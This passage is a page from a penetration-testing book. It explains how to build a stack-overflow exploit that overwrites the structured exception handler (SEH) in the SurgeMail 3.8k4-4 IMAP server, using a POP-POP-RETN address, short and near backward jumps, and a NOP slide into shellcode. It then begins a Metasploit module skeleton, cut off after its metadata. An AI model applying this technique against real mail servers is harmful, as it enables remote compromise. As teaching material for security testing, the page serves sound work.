background image

204

Chapter 14

Hopping Around SEH Restrictions

Following the SEH overwrite, there’s very little space for shellcode before the 
end of the stack. Normally, a 

POP-POP-RETN

 set of instructions would be used 

to reach the Next SEH (NSEH), followed by a short jump forward into the 
shellcode. We’ll overcome this limited space restriction by developing an 
exploit to use as much space as possible for our final payload. At this point, 
we are done with the fuzzing process and we’ll move into developing an 
exploit for the vulnerability that we found.

This exploit would be a good candidate for an 

egg hunter

, which is a small 

segment of shellcode that searches memory for the main payload; however, 
we’ll use a different tactic and overwrite SEH with the 

POP-POP-RETN

 instruc-

tion pointer. Once that’s overwritten we’ll make a short jump backward that 
requires very few instructions (rather than jumping forward). Next, we’ll use 
the space gained in the short jump to execute the larger near jump farther 
back into a NOP slide and shellcode. Although it’s not required, a NOP slide 
is always a good addition to an exploit, because it gives you a little room for 
error should the buffer position change in memory. NOPs will have no adverse 
impact on the exploit code and will act as filler. Conceptually, the attack will 
look like this:

[Buffer of garbage | NOP Slide | Shellcode | Near Jump | Short Jump | POP-POP-RETN]

To ensure portability of the exploit across different versions of Windows, 

use a return address from an application DLL or executable. In this case, 
only the application executable itself is available, so you can try to accom-
plish a three-byte overwrite of SEH using a 

POP-POP-RETN

 sequence of 

instructions from the 

surgemail.exe

 file. If this can be done successfully, the 

exploit will be universal across versions of Windows.

Let’s move on to creating the actual exploit for the SurgeMail vulnerability. 

Following is our initial skeleton exploit module to be saved in 

/root/.msf3/

modules/exploits/windows/imap/

:

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

    include Msf::Exploit::Remote::Imap

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Surgemail 3.8k4-4 IMAPD LIST Buffer Overflow',
            'Description'    => %q{
                This module exploits a stack overflow in the Surgemail IMAP Server
                version 3.8k4-4 by sending an overly long LIST command. Valid IMAP
                account credentials are required.
            },
            'Author'         => [ 'ryujin' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 1 $',